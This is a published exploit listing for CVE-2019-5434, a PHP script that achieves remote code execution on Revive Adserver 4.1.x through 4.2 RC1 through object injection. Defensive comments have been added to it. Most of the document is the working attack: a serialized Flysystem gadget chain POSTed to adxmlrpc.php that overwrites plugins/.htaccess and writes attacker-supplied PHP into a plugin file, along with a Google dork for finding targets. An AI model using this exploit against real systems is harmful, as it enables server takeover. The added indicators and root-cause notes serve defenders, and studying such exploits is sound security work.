Published on December 3rd, 2019
Revive Adserver 4.2 – Remote Code Execution
# Exploit Title: Revive Adserver 4.2 - Remote Code Execution
# Google Dork: "inurl:www/delivery filetype:php"
# Exploit Author: crlf
# Vendor Homepage: https://www.revive-adserver.com/
# Software Link: https://www.revive-adserver.com/download/archive/
# Version: 4.1.x <= 4.2 RC1
# Tested on: *nix
# CVE : CVE-2019-5434
# Contains a syntax error for protection against skids
<?php
# Revive Adserver 4.1.x <= 4.2 RC1 PHP Object Injection to Remote Code Execution (CVE-2019-5434)
# coded by @crlf, with love for antichat.com
# special thanks to @Kaimi :)
# the script should be used only for educational purposes!
namespace{
# Proof-of-concept driver for CVE-2019-5434 (PHP object injection in Revive Adserver, per the
# file header). The header states the listing was published with a deliberate syntax error; the
# code is kept byte-for-byte here as reference material for defenders, not as a runnable tool.
#
# Defensive reading of the flow below:
#   - all traffic is HTTP POST to the target's adxmlrpc.php delivery script (see request());
#   - two files under plugins/ are overwritten, so unexpected changes to them are an indicator;
#   - the affected range given in the header is 4.1.x <= 4.2 RC1, so the remedy is to run a
#     release newer than that range.

# Command line: $argv[1] is the base URL of the installation, $argv[2] the content to be written.
# When the second argument is missing, a usage line is printed and the script exits.
(!isset($argv[2]) ? exit(message('php '.basename(__FILE__).' https://example.com/adserver-dir/ ''')) : @list($x, $url, $code) = $argv);
# Request 1: the source is a data: URI whose decoded content is the single character '#', and the
# destination is plugins/.htaccess, i.e. that file's content is replaced by a lone comment marker.
# Presumably this drops whatever access rules the shipped .htaccess carried; confirm against the product.
$source = 'data:text/html;base64,'.base64_encode('#');
$destination = 'plugins/.htaccess';
#$destination = 'var/.htaccess';
# The reply is only checked for the substring 'methodResponse' (the XML-RPC response element).
if(!strpos(request($url, $source, $destination), 'methodResponse')) exit(message('failed, no valid response from '.$url));
# Request 2: same mechanism, now carrying the operator-supplied content and aimed at a PHP class
# file inside the plugins tree. Monitoring: alert on any modification of this path.
$source = 'data:text/html;base64,'.base64_encode($code);
$destination = 'plugins/3rdPartyServers/ox3rdPartyServers/doubleclick.class.php';
#$destination = 'var/default.conf.php';
request($url, $source, $destination);
# Prints the URL of the file that request 2 targeted.
message('check '.$url.$destination);
# Builds the serialized object graph and POSTs it to <url>adxmlrpc.php.
#   $url          base URL of the installation (the caller passes $argv[1])
#   $source       data: URI holding the content to be copied
#   $destination  destination path string (the caller passes paths under plugins/)
# Returns whatever file_get_contents() returns: the response body, or false on failure.
#
# The classes instantiated here are the stubs declared in the namespaces further down. They exist
# only so that serialize() emits class and property names for the target to rebuild, presumably
# via unserialize() on the 'what' value; the server side is not shown on this page.
# Root-cause note for defenders: unserialize() on request data should be replaced by a data-only
# format such as JSON, or at minimum restricted with the allowed_classes option.
function request($url, $source, $destination){
$what = serialize(
['what' =>
new PdpUriUrl(
new LeagueFlysystemFile( $destination,
new LeagueFlysystemFile( 'x://'.$source,
new LeagueFlysystemMountManager(
new LeagueFlysystemFilesystem(
new LeagueFlysystemConfig,
new LeagueFlysystemAdapterLocal('')
),
new LeagueFlysystemPluginForcedCopy
)
)
)
)
]
);
# Post-processing of the serialized text before it is embedded in the request body.
# Left exactly as published.
$what = str_replace(['UriUrl0'],['5CUri5CUrl0'], str_replace(['s:', сhr(0)],['S:', '0'], $what));
# Request body. On this page the XML-RPC markup has not survived, only its text nodes: the method
# name openads.spc, a remote_addr value, a cookies entry, the serialized payload, and a few scalars.
# Detection: a POST to adxmlrpc.php naming openads.spc and containing PHP serialized-object syntax
# is worth alerting on.
$xml = '
openads.spc
remote_addr
8.8.8.8
cookies
'.$what.'
0
dsad
1
0
1
';
# Plain HTTP POST through PHP's stream wrapper. The User-Agent is a fixed Firefox 64 string, which
# makes it a weak indicator at best because it is trivially changed.
return file_get_contents($url.'adxmlrpc.php', false, stream_context_create(
['http' =>
['method' => 'POST',
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',
'header' =>'Content-type: application/x-www-form-urlencoded',
'content'=> $xml
]
])
);
}
# Prints $str framed by '### ' and ' ###' with blank lines around it; returns nothing.
function message($str){
print PHP_EOL.'### '.$str.' ###'.PHP_EOL.PHP_EOL;
}
}
namespace LeagueFlysystemPlugin{
# Empty stub: it carries no state and contributes only its class name to the serialized data
# built in request(). Presumably the name stands for a plugin class of the Flysystem library
# shipped with the target; the real class is not shown on this page.
class ForcedCopy{}
}
namespace LeagueFlysystem{
# Stubs used by request() to build the serialized data. Each one declares only property names and
# the values to be serialized; none has any behaviour of its own. Presumably they mirror classes
# of the Flysystem library on the target, which are not shown on this page.
# Defensive takeaway: when request data reaches unserialize(), the sender chooses both the class
# and every property value, so any autoloadable class becomes part of the attack surface.

# Holds a settings map; the constructor fixes it to ['disable_asserts' => true].
class Config{
protected $settings = [];
public function __construct(){
$this->settings = ['disable_asserts' => true];
}
}
# Pairs a config object with an adapter object.
class Filesystem{
protected $adapter;
protected $config;
public function __construct($config,$adapter){
$this->config = $config;
$this->adapter = $adapter;
}
}
# Stores the given filesystem under the key 'x' (request() builds a path starting with 'x://')
# and the given handler under the key '__toString' in the plugins map.
class MountManager{
protected $filesystems = [];
protected $plugins = [];
public function __construct($filesystem, $handler){
$this->filesystems = ['x' => $filesystem];
$this->plugins = ['__toString' => $handler];
}
}
# A path plus the object stored as its filesystem. request() nests one File inside another,
# so $obj is not always a Filesystem.
class File{
protected $path;
protected $filesystem;
public function __construct($path, $obj){
$this->filesystem = $obj;
$this->path = $path;
}
}
}
namespace LeagueFlysystemAdapter{
# Stub adapter that holds only a path prefix; request() passes an empty string.
# Presumably it mirrors the local-disk adapter of the Flysystem library on the target, which is
# not shown on this page.
class Local{
protected $pathPrefix;
public function __construct($prefix){
$this->pathPrefix = $prefix;
}
}
}
namespace PdpUri{
# Outermost object of the serialized data built in request(): its private $host property is set
# to the object passed in (a File stub), not to a host name.
# Presumably it mirrors a URL class from a library bundled with the target, which is not shown on
# this page.
class Url{
private $host;
public function __construct($file){
$this->host = $file;
}
}
}
https://www.exploit-db.com/exploits/47739